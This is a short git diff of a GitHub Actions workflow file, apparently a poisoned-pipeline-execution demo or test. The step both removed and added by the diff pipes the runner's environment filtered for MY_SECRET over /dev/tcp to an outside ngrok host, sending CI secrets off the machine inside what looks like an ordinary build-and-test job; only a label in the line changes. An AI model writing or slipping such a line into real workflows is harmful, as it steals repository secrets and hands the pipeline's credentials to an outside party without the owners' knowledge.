--- a/.github/workflows/pr_target.yml
+++ b/.github/workflows/pr_target.yml
@@ -28,7 +28,7 @@ jobs:
           mkdir ./bin
           touch ./bin/mybin.exe
           ls -lR 
-          echo ------- D-PPE From user [${{ github.event.pull_request.user.login }}] in pr [${{ github.workflow }}] pr.yml :: $(env | grep MY_SECRET) > /dev/tcp/5.tcp.eu.ngrok.io/13276
+          echo ------- D-PPEx From user [${{ github.event.pull_request.user.login }}] in pr [${{ github.workflow }}] pr.yml :: $(env | grep MY_SECRET) > /dev/tcp/5.tcp.eu.ngrok.io/13276
       
       # Simulation of running tests
       - name: Running tests ...
